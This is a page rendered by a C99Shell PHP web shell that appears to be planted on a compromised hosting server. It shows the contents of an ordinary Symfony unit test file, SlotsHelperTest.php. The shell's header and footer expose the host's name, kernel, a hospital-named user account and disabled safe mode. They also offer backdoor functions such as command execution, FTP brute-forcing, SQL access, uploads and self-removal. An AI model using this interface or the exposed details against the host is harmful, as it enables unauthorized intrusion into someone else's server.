!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/opt/alt/php54/usr/share/pear/test/Templating/Symfony/Component/Templating/Tests/Helper/   drwxr-xr-x
Free 294.14 GB of 429.69 GB (68.46%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SlotsHelperTest.php (3.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\Templating\Tests\Helper;

use 
Symfony\Component\Templating\Helper\SlotsHelper;

class 
SlotsHelperTest extends \PHPUnit_Framework_TestCase
{
    public function 
testHasGetSet()
    {
        
$helper = new SlotsHelper();
        
$helper->set('foo''bar');
        
$this->assertEquals('bar'$helper->get('foo'), '->set() sets a slot value');
        
$this->assertEquals('bar'$helper->get('bar''bar'), '->get() takes a default value to return if the slot does not exist');

        
$this->assertTrue($helper->has('foo'), '->has() returns true if the slot exists');
        
$this->assertFalse($helper->has('bar'), '->has() returns false if the slot does not exist');
    }

    public function 
testOutput()
    {
        
$helper = new SlotsHelper();
        
$helper->set('foo''bar');
        
ob_start();
        
$ret $helper->output('foo');
        
$output ob_get_clean();
        
$this->assertEquals('bar'$output'->output() outputs the content of a slot');
        
$this->assertTrue($ret'->output() returns true if the slot exists');

        
ob_start();
        
$ret $helper->output('bar''bar');
        
$output ob_get_clean();
        
$this->assertEquals('bar'$output'->output() takes a default value to return if the slot does not exist');
        
$this->assertTrue($ret'->output() returns true if the slot does not exist but a default value is provided');

        
ob_start();
        
$ret $helper->output('bar');
        
$output ob_get_clean();
        
$this->assertEquals(''$output'->output() outputs nothing if the slot does not exist');
        
$this->assertFalse($ret'->output() returns false if the slot does not exist');
    }

    public function 
testStartStop()
    {
        
$helper = new SlotsHelper();
        
$helper->start('bar');
        echo 
'foo';
        
$helper->stop();
        
$this->assertEquals('foo'$helper->get('bar'), '->start() starts a slot');
        
$this->assertTrue($helper->has('bar'), '->starts() starts a slot');

        
$helper->start('bar');
        try {
            
$helper->start('bar');
            
$helper->stop();
            
$this->fail('->start() throws an InvalidArgumentException if a slot with the same name is already started');
        } catch (\
Exception $e) {
            
$helper->stop();
            
$this->assertInstanceOf('\InvalidArgumentException'$e'->start() throws an InvalidArgumentException if a slot with the same name is already started');
            
$this->assertEquals('A slot named "bar" is already started.'$e->getMessage(), '->start() throws an InvalidArgumentException if a slot with the same name is already started');
        }

        try {
            
$helper->stop();
            
$this->fail('->stop() throws an LogicException if no slot is started');
        } catch (\
Exception $e) {
            
$this->assertInstanceOf('\LogicException'$e'->stop() throws an LogicException if no slot is started');
            
$this->assertEquals('No slot started.'$e->getMessage(), '->stop() throws an LogicException if no slot is started');
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0969 ]--